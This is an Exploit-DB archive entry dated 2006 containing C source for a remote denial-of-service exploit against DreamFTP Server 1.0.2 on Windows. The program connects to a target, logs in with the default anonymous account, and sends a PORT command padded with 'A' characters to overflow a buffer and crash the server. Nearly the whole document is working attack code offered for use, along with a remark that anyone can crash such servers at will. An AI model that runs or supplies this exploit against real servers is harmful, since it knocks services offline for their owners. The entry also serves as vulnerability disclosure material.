BolinTech DreamFTP Server 1.0.2 - 'PORT' Remote Denial of Service

EDB-ID:

2972


Author:

InTeL

Type:

dos


Platform:

Windows

Date:

2006-12-21


/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default 
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled try it with 
a another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


int usage(char *filename)
{
	   printf("Dream FTP v1.02 DoS exploit\r\n");
	   printf("By InTeL\r\n");
	   printf("USAGE: %s <IP_Address> <port>\r\n", filename);

	exit(0);
}

int main(int argc, char *argv[])
{
	char evilbuf[40], recvbuf[1028];
	unsigned short port;
	struct sockaddr_in saddr;
	struct hostent *he;
	WSADATA wsaData;
	SOCKET sock;

	if(argc != 3)
		usage(argv[0]);

	port = atoi(argv[2]);	
	if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
		printf("Unable to initialize Winsock \n");
		exit(1);
	}

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
		printf("Socket Error \n");
		exit(1);
	}

	if ((he = gethostbyname(argv[1])) == NULL){  
		printf("Couldnt Resolve %s \n",argv[1]);
		exit(1);
	}

	memset(&saddr, 0, sizeof(saddr));
	saddr.sin_family = AF_INET;
	saddr.sin_addr = *((struct in_addr *)he->h_addr);	
	saddr.sin_port = htons(port);

	if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
		printf("Connect Error \n");
      	exit(1);
	}

	for(int i = 0; i<3;i++){
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
	}
	printf("Logging in\r\n");	

	memset(evilbuf, 0,sizeof(evilbuf));
	strcpy(evilbuf, "USER Anonymous\r\n"); //USER
	send (sock, evilbuf, strlen(evilbuf), 0);
   
	for(i=0;i<4;i++){
		memset(recvbuf,0,sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
   
	memset(evilbuf, 0, sizeof(evilbuf));
	strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
	send (sock, evilbuf, strlen(evilbuf), 0);

	for(i=0; i<3;i++) {
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
	printf("Building overflow string\r\n");

	memset(evilbuf,0,sizeof(evilbuf));
	strcpy(evilbuf, "PORT ");  //PORT 
	for(i = 5;i != 36;i++)
		evilbuf[i] = 'A';
   	strcat(evilbuf,"\r\n");
	
	send (sock, evilbuf, strlen(evilbuf), 0);  
   
	printf("DoS Attack Done\r\n");
	closesocket(sock);

	return 0;
}

// milw0rm.com [2006-12-21]